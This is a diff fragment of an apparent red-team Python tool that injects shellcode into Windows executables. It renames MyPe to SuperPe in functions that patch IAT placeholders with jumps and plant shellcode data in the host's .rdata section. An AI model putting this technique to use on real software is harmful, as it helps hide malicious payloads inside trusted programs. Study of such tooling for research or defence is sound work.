@@ -74,9 +73,9 @@ def inject_exe(
# raise Exception("Shellcode injection error") # raise Exception("Shellcode injection error")
def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost): def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
"""replace IAT-placeholders in shellcode with call's to the IAT""" """replace IAT-placeholders in shellcode with call's to the IAT"""
code = mype.get_code_section_data() code = superpe.get_code_section_data()
for iatRequest in carrier.get_all_iat_requests(): for iatRequest in carrier.get_all_iat_requests():
if not iatRequest.placeholder in code: if not iatRequest.placeholder in code:
@@ -95,10 +94,10 @@ def injected_fix_iat(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
) )
code = code.replace(iatRequest.placeholder, jmp) code = code.replace(iatRequest.placeholder, jmp)
mype.write_code_section_data(code) superpe.write_code_section_data(code)
def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost): def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost):
"""Inject shellcode-data into .rdata and replace reusedata_fixup placeholders in code with LEA""" """Inject shellcode-data into .rdata and replace reusedata_fixup placeholders in code with LEA"""
# Insert my data into the .rdata section. # Insert my data into the .rdata section.
# Chose and save each datareuse_fixup's addres. # Chose and save each datareuse_fixup's addres.
@@ -115,7 +114,7 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
var_data = datareuse_fixup.data var_data = datareuse_fixup.data
#print(" Addr: {} / 0x{:X} Data: {}".format( #print(" Addr: {} / 0x{:X} Data: {}".format(
# addr, addr, len(var_data))) # addr, addr, len(var_data)))
mype.pe.set_bytes_at_offset(addr, var_data) superpe.pe.set_bytes_at_offset(addr, var_data)
#f.seek(addr) #f.seek(addr)
#f.write(var_data) #f.write(var_data)
datareuse_fixup.addr = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr datareuse_fixup.addr = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr
@@ -123,7 +122,7 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
# patch code section # patch code section
# replace the placeholder with a LEA instruction to the data we written above # replace the placeholder with a LEA instruction to the data we written above
code = mype.get_code_section_data() code = superpe.get_code_section_data()
for datareuse_fixup in reusedata_fixups: for datareuse_fixup in reusedata_fixups:
if not datareuse_fixup.randbytes in code: if not datareuse_fixup.randbytes in code:
raise Exception("DataResuse: ID {} not found, abort".format( raise Exception("DataResuse: ID {} not found, abort".format(
@@ -139,7 +138,7 @@ def injected_fix_data(mype: MyPe, carrier: Carrier, exe_host: ExeHost):
instruction_virtual_address, destination_virtual_address, datareuse_fixup.register instruction_virtual_address, destination_virtual_address, datareuse_fixup.register
) )
code = code.replace(datareuse_fixup.randbytes, lea) code = code.replace(datareuse_fixup.randbytes, lea)
mype.write_code_section_data(code) superpe.write_code_section_data(code)
def verify_injected_exe(exefile: FilePath) -> int: def verify_injected_exe(exefile: FilePath) -> int: